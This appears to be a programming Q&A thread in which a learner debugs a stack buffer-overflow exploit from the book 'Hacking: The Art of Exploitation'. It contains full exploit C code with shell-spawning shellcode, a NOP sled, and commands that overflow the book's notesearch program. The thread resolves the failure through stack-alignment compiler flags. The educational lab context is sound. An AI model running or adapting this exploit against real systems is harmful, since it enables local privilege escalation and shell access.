# Why won't this shellcode execute?

Tags: c, environment-variables, shellcode

I'm working through *Hacking: The Art of Exploitation* and am running into my first snag trying to get a known working exploit to run from the book via an environment variable. All programs were compiled with `-fno-stack-protector -zexecstack -no-pie -fno-pie`.

Running `exploit_notesearch.c` (albeit with a a very specific offset), I was able to get the exploit to pop a shell by moving the offset with `argv[1]`. This works on modern OSes (with ASLR disabled) as well as the LiveCD included with the book.

[notesearch.c](https://github.com/intere/hacking/blob/master/booksrc/notesearch.c)

**exploit_notesearch.c**

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=208;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}
```

Further on in the chapter, we set the shellcode to an environment variable and attempt to redirect flow to the place on the stack where the SHELLCODE environment variable is set, halfway through the prepended NOP sled. However, this never executes the exploit on modern OSes but works just fine in the Ubuntu 7.04 live CD that came with the book. `shellcode.bin` is the shellcode at the top of the `exploit_notesearch.c` file ran with `echo -en` and redirected into a file.

```sh
$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
$ ./notesearch $(perl -e 'print "\x17\xf2\xff\xbf"x40') # Address halfway through NOP sled
```

What is going on here that has changed between old OSes and modern? Is there a protection I'm unaware of that is preventing from riding the NOP sled to the shellcode?

Thank you.

Comment: Did you try inspecting that address with your debugger and seeing if the shellcode is actually there?  The layout of the environment could have changed, or maybe you just have other environment variables set that are shifting things around.  A 200 byte sled is not all that big, relatively speaking, and so you don't have a lot of wiggle room.

Comment: I did. I'll try expanding the NOP sled, however - even in the original exploit I had to move the exploit to the exact shellcode location. There wasn't any hitting the 60 byte nopsled for wiggle room. Not sure if I've missed something.

`0xbffff22b: "SHELLCODE=", '\220' <repeats 190 times>...`
`(gdb) x/s 0xbffff22b + 100`
`0xbffff28f: '\220' <repeats 110 times>, "\061...`

`$ ./notesearch $(perl -e 'print "\x8f\xf2\xff\xbf"x40')`

Comment: dmesg shows the following, so I assume I'm hitting it. `[10472.065801] notesearch[12031]: segfault at 90909090 ip 90909090 sp bfffef0b error 14`

Comment: That message looks like somehow you managed to *jump* to address 90909090.  I think it's time to single-step with your debugger and see how you got there.

Comment: Thanks for your help. Stack alignment was the problem. `-mpreferred-stack-boundary=2` is the difference between the HTAOE CD and more recent version of Ubuntu I'm running. After adjusting to 2, the exploit runs swimmingly. Added to my list of things to subvert when done with the book.

Answer (score 0):

The problem was stack alignment, compiling with `-mpreferred-stack-boundary=2` aligns the stack similarly to the book.